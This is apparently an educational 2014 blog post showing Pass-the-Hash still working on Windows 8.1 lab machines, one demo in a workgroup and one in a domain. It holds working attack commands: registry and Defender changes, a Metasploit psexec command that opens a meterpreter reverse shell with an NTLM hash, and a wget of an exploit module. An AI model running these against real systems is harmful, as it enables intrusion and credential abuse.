Pass the Hash on Windows 8.1

Microsoft claims that the Pass the Hash exploit has finally been patched in Windows 8.1, as trumpeted in Oct, 2013:

http://www.infoworld.com/d/security/windows-81-stops-pass-the-hash-attacks-227875

The man who made the patch will be speaking next week at CCSF.

But when I posted this on Twitter, @obscuresec @passingthehash and @jameslyne engaged me in lively discussion, claiming PtH still works.

And, with their help, I got it working two ways.

1. Simple Demo on a Workgroup

Setup

I made a clean install of Windows 8.1 into a virtual machine, and made these adjustments, as recommended here:

http://colesec.inventedtheinternet.com/hacking-windows-passwords-with-pass-the-hash/

1. In HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters, make sure "RequireSecuritySignature" is set to 0 (it was)

2. In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, add a new DWORD (32-bit) called "LocalAccountTokenFilterPolicy" and set it to 1

3. Disable real-time protection in Windows Defender.

From Kali Linux, perform a Pass-the-Hash attack with this command, adjusting the IP addresses to be correct:

msfcli msfcli /usr/share/metasploit-framework/lib/msf/core/exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.119.241 LPORT=443 RHOST=192.168.119.248 SMBUser=Admin2 SMBPass=aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 E

It works, as shown below:

2. In a Domain

Here's what I did:

1. Make a Server 2012 domain controller as explained here:

http://samsclass.info/345/proj10/p19-S12dc.htm
2. Join Win 8.1 machine to domain

3. In "Network and Sharing Center", click "Change advanced sharing settings". In the Domain profile, turn on "network discovery" and "file and printer sharing".

4. Turn off Windows Firewall for Domain profile

5. In Kali:

cd

cd .msf4/modules

mkdir exploits

cd exploits
 
mkdir windows

cd windows

mkdir powershell

cd powershell

wget https://raw.github.com/jakxx/metasploit-framework/powershell_psexec/modules/exploits/windows/powershell/powershell_psexec.rb

msfconsole

use exploit/windows/powershell/powershell_psexec
set RHOST 192.168.119.248
set LHOST 192.168.119.241 
set ARCH x86
set SMBDomain sam.com
set SMBUser Administrator
set SMBPASS 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42
exploit
As you can see below, it worked!


Posted 6:36 pm 2-22-14 by Sam Bowne
Domain version added 8:35 pm 2-22-14